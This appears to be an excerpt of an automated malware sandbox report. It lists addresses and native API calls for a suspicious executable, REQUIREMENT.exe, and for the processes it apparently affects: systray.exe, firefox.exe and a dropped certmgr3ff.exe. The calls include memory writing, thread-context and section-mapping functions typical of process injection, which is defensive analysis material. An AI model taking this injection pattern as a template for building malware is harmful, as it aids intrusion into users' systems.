Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6805 NtWriteVirtualMemory,	1_2_023B6805
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6479 NtWriteVirtualMemory,	1_2_023B6479
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6071 NtWriteVirtualMemory,	1_2_023B6071
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A75 NtWriteVirtualMemory,	1_2_023B6A75
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6269 NtWriteVirtualMemory,	1_2_023B6269
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A69 NtWriteVirtualMemory,	1_2_023B6A69
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B646D NtWriteVirtualMemory,	1_2_023B646D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6065 NtWriteVirtualMemory,	1_2_023B6065
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6059 NtWriteVirtualMemory,	1_2_023B6059
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B625D NtWriteVirtualMemory,	1_2_023B625D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A5D NtWriteVirtualMemory,	1_2_023B6A5D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BA25C NtWriteVirtualMemory,LoadLibraryA,	1_2_023BA25C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6251 NtWriteVirtualMemory,	1_2_023B6251
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B684C NtWriteVirtualMemory,	1_2_023B684C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6041 NtWriteVirtualMemory,	1_2_023B6041
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6841 NtWriteVirtualMemory,	1_2_023B6841
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B58A9 NtWriteVirtualMemory,	1_2_023B58A9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B64A9 NtWriteVirtualMemory,	1_2_023B64A9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6AA5 NtWriteVirtualMemory,	1_2_023B6AA5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A99 NtWriteVirtualMemory,	1_2_023B6A99
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B649D NtWriteVirtualMemory,	1_2_023B649D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6491 NtWriteVirtualMemory,	1_2_023B6491
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B628D NtWriteVirtualMemory,	1_2_023B628D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A8D NtWriteVirtualMemory,	1_2_023B6A8D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6281 NtWriteVirtualMemory,	1_2_023B6281
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6485 NtWriteVirtualMemory,	1_2_023B6485
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EFD NtWriteVirtualMemory,	1_2_023B5EFD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6CE1 NtWriteVirtualMemory,	1_2_023B6CE1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EE5 NtWriteVirtualMemory,	1_2_023B5EE5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5ED9 NtWriteVirtualMemory,	1_2_023B5ED9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5ECD NtWriteVirtualMemory,	1_2_023B5ECD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EC3 NtWriteVirtualMemory,	1_2_023B5EC3
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B673B NtWriteVirtualMemory,	1_2_023B673B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B613D NtWriteVirtualMemory,	1_2_023B613D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6935 NtWriteVirtualMemory,	1_2_023B6935
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6929 NtWriteVirtualMemory,	1_2_023B6929
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5F11 NtWriteVirtualMemory,	1_2_023B5F11
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5F15 NtWriteVirtualMemory,	1_2_023B5F15
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6179 NtWriteVirtualMemory,	1_2_023B6179
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B637D NtWriteVirtualMemory,	1_2_023B637D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6769 NtWriteVirtualMemory,	1_2_023B6769
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B616D NtWriteVirtualMemory,	1_2_023B616D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6365 NtWriteVirtualMemory,	1_2_023B6365
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B635B NtWriteVirtualMemory,	1_2_023B635B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6959 NtWriteVirtualMemory,	1_2_023B6959
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B675D NtWriteVirtualMemory,	1_2_023B675D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6751 NtWriteVirtualMemory,	1_2_023B6751
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6155 NtWriteVirtualMemory,	1_2_023B6155
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B694D NtWriteVirtualMemory,	1_2_023B694D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6941 NtWriteVirtualMemory,	1_2_023B6941
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6745 NtWriteVirtualMemory,	1_2_023B6745
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65BD NtWriteVirtualMemory,	1_2_023B65BD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65B1 NtWriteVirtualMemory,	1_2_023B65B1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6395 NtWriteVirtualMemory,	1_2_023B6395
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6389 NtWriteVirtualMemory,	1_2_023B6389
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6185 NtWriteVirtualMemory,	1_2_023B6185
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BF5 NtWriteVirtualMemory,	1_2_023B6BF5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65E1 NtWriteVirtualMemory,	1_2_023B65E1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BDD NtWriteVirtualMemory,	1_2_023B6BDD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BD1 NtWriteVirtualMemory,	1_2_023B6BD1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65D5 NtWriteVirtualMemory,	1_2_023B65D5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65C9 NtWriteVirtualMemory,	1_2_023B65C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BC5 NtWriteVirtualMemory,	1_2_023B6BC5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D34E0 NtCreateMutant,LdrInitializeThunk,	3_2_1E9D34E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2EB0 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_1E9D2EB0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2ED0 NtResumeThread,LdrInitializeThunk,	3_2_1E9D2ED0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2E50 NtCreateSection,LdrInitializeThunk,	3_2_1E9D2E50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2F00 NtCreateFile,LdrInitializeThunk,	3_2_1E9D2F00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2CF0 NtDelayExecution,LdrInitializeThunk,	3_2_1E9D2CF0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2C30 NtMapViewOfSection,LdrInitializeThunk,	3_2_1E9D2C30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2C50 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_1E9D2C50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2DA0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_1E9D2DA0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_1E9D2DC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2D10 NtQuerySystemInformation,LdrInitializeThunk,	3_2_1E9D2D10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_1E9D2B90
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2BC0 NtQueryInformationToken,LdrInitializeThunk,	3_2_1E9D2BC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_1E9D2B10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D29F0 NtReadFile,LdrInitializeThunk,	3_2_1E9D29F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D3C90 NtOpenThread,	3_2_1E9D3C90
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D3C30 NtOpenProcessToken,	3_2_1E9D3C30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D38D0 NtGetContextThread,	3_2_1E9D38D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2E80 NtCreateProcessEx,	3_2_1E9D2E80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2EC0 NtQuerySection,	3_2_1E9D2EC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2E00 NtQueueApcThread,	3_2_1E9D2E00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2FB0 NtSetValueKey,	3_2_1E9D2FB0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2F30 NtOpenDirectoryObject,	3_2_1E9D2F30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2CD0 NtEnumerateKey,	3_2_1E9D2CD0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2C10 NtOpenProcess,	3_2_1E9D2C10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2C20 NtSetInformationFile,	3_2_1E9D2C20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2D50 NtWriteVirtualMemory,	3_2_1E9D2D50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2A80 NtClose,	3_2_1E9D2A80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2AA0 NtQueryInformationFile,	3_2_1E9D2AA0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2AC0 NtEnumerateValueKey,	3_2_1E9D2AC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2A10 NtWriteFile,	3_2_1E9D2A10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B80 NtCreateKey,	3_2_1E9D2B80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2BE0 NtQueryVirtualMemory,	3_2_1E9D2BE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B00 NtQueryValueKey,	3_2_1E9D2B00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B20 NtQueryInformationProcess,	3_2_1E9D2B20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D29D0 NtWaitForSingleObject,	3_2_1E9D29D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D4570 NtSuspendThread,	3_2_1E9D4570
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D4260 NtSetContextThread,	3_2_1E9D4260
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2CF0 NtDelayExecution,LdrInitializeThunk,	13_2_049D2CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2C30 NtMapViewOfSection,LdrInitializeThunk,	13_2_049D2C30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_049D2DC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2D10 NtQuerySystemInformation,LdrInitializeThunk,	13_2_049D2D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2E50 NtCreateSection,LdrInitializeThunk,	13_2_049D2E50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2FB0 NtSetValueKey,LdrInitializeThunk,	13_2_049D2FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2F00 NtCreateFile,LdrInitializeThunk,	13_2_049D2F00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D29F0 NtReadFile,LdrInitializeThunk,	13_2_049D29F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2A80 NtClose,LdrInitializeThunk,	13_2_049D2A80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2AC0 NtEnumerateValueKey,LdrInitializeThunk,	13_2_049D2AC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_049D2B90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B80 NtCreateKey,LdrInitializeThunk,	13_2_049D2B80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2BC0 NtQueryInformationToken,LdrInitializeThunk,	13_2_049D2BC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_049D2B10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B00 NtQueryValueKey,LdrInitializeThunk,	13_2_049D2B00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D34E0 NtCreateMutant,LdrInitializeThunk,	13_2_049D34E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D4570 NtSuspendThread,	13_2_049D4570
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D4260 NtSetContextThread,	13_2_049D4260
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2CD0 NtEnumerateKey,	13_2_049D2CD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2C10 NtOpenProcess,	13_2_049D2C10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2C20 NtSetInformationFile,	13_2_049D2C20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2C50 NtUnmapViewOfSection,	13_2_049D2C50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2DA0 NtReadVirtualMemory,	13_2_049D2DA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2D50 NtWriteVirtualMemory,	13_2_049D2D50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2E80 NtCreateProcessEx,	13_2_049D2E80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2EB0 NtProtectVirtualMemory,	13_2_049D2EB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2ED0 NtResumeThread,	13_2_049D2ED0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2EC0 NtQuerySection,	13_2_049D2EC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2E00 NtQueueApcThread,	13_2_049D2E00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2F30 NtOpenDirectoryObject,	13_2_049D2F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D29D0 NtWaitForSingleObject,	13_2_049D29D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2AA0 NtQueryInformationFile,	13_2_049D2AA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2A10 NtWriteFile,	13_2_049D2A10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2BE0 NtQueryVirtualMemory,	13_2_049D2BE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B20 NtQueryInformationProcess,	13_2_049D2B20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D3C90 NtOpenThread,	13_2_049D3C90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D3C30 NtOpenProcessToken,	13_2_049D3C30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D38D0 NtGetContextThread,	13_2_049D38D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E8660 NtReadFile,	13_2_027E8660
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E86E0 NtClose,	13_2_027E86E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E8790 NtAllocateVirtualMemory,	13_2_027E8790
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E85B0 NtCreateFile,	13_2_027E85B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E865A NtReadFile,	13_2_027E865A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E86DB NtReadFile,NtClose,	13_2_027E86DB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E85AA NtCreateFile,	13_2_027E85AA
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E92741ED02 NtCreateFile,	21_2_000001E92741ED02
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241B688 NtProtectVirtualMemory,	23_2_0241B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024176AD NtAllocateVirtualMemory,	23_2_024176AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241BBCC NtSetContextThread,	23_2_0241BBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416041 NtWriteVirtualMemory,	23_2_02416041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416841 NtWriteVirtualMemory,	23_2_02416841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241684C NtWriteVirtualMemory,	23_2_0241684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416251 NtWriteVirtualMemory,	23_2_02416251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416059 NtWriteVirtualMemory,	23_2_02416059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241625D NtWriteVirtualMemory,	23_2_0241625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A5D NtWriteVirtualMemory,	23_2_02416A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241A25C NtWriteVirtualMemory,LoadLibraryA,	23_2_0241A25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416065 NtWriteVirtualMemory,	23_2_02416065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416269 NtWriteVirtualMemory,	23_2_02416269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A69 NtWriteVirtualMemory,	23_2_02416A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241646D NtWriteVirtualMemory,	23_2_0241646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416071 NtWriteVirtualMemory,	23_2_02416071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A75 NtWriteVirtualMemory,	23_2_02416A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416479 NtWriteVirtualMemory,	23_2_02416479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416805 NtWriteVirtualMemory,	23_2_02416805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241681D NtWriteVirtualMemory,	23_2_0241681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416029 NtWriteVirtualMemory,	23_2_02416029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416829 NtWriteVirtualMemory,	23_2_02416829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416035 NtWriteVirtualMemory,	23_2_02416035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416835 NtWriteVirtualMemory,	23_2_02416835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415EC3 NtWriteVirtualMemory,	23_2_02415EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415ECD NtWriteVirtualMemory,	23_2_02415ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415ED9 NtWriteVirtualMemory,	23_2_02415ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416CE1 NtWriteVirtualMemory,	23_2_02416CE1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415EE5 NtWriteVirtualMemory,	23_2_02415EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415EFD NtWriteVirtualMemory,	23_2_02415EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416281 NtWriteVirtualMemory,	23_2_02416281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416485 NtWriteVirtualMemory,	23_2_02416485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241628D NtWriteVirtualMemory,	23_2_0241628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A8D NtWriteVirtualMemory,	23_2_02416A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416491 NtWriteVirtualMemory,	23_2_02416491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A99 NtWriteVirtualMemory,	23_2_02416A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241649D NtWriteVirtualMemory,	23_2_0241649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416AA5 NtWriteVirtualMemory,	23_2_02416AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024158A9 NtWriteVirtualMemory,	23_2_024158A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024164A9 NtWriteVirtualMemory,	23_2_024164A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416941 NtWriteVirtualMemory,	23_2_02416941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416745 NtWriteVirtualMemory,	23_2_02416745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241694D NtWriteVirtualMemory,	23_2_0241694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416751 NtWriteVirtualMemory,	23_2_02416751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416155 NtWriteVirtualMemory,	23_2_02416155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416959 NtWriteVirtualMemory,	23_2_02416959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241635B NtWriteVirtualMemory,	23_2_0241635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241675D NtWriteVirtualMemory,	23_2_0241675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416365 NtWriteVirtualMemory,	23_2_02416365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416769 NtWriteVirtualMemory,	23_2_02416769
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241616D NtWriteVirtualMemory,	23_2_0241616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416179 NtWriteVirtualMemory,	23_2_02416179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241637D NtWriteVirtualMemory,	23_2_0241637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415F11 NtWriteVirtualMemory,	23_2_02415F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415F15 NtWriteVirtualMemory,	23_2_02415F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416929 NtWriteVirtualMemory,	23_2_02416929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416935 NtWriteVirtualMemory,	23_2_02416935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241673B NtWriteVirtualMemory,	23_2_0241673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241613D NtWriteVirtualMemory,	23_2_0241613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BC5 NtWriteVirtualMemory,	23_2_02416BC5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165C9 NtWriteVirtualMemory,	23_2_024165C9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BD1 NtWriteVirtualMemory,	23_2_02416BD1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165D5 NtWriteVirtualMemory,	23_2_024165D5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BDD NtWriteVirtualMemory,	23_2_02416BDD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165E1 NtWriteVirtualMemory,	23_2_024165E1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BF5 NtWriteVirtualMemory,	23_2_02416BF5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416185 NtWriteVirtualMemory,	23_2_02416185
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416389 NtWriteVirtualMemory,	23_2_02416389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416395 NtWriteVirtualMemory,	23_2_02416395
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165B1 NtWriteVirtualMemory,	23_2_024165B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165BD NtWriteVirtualMemory,	23_2_024165BD
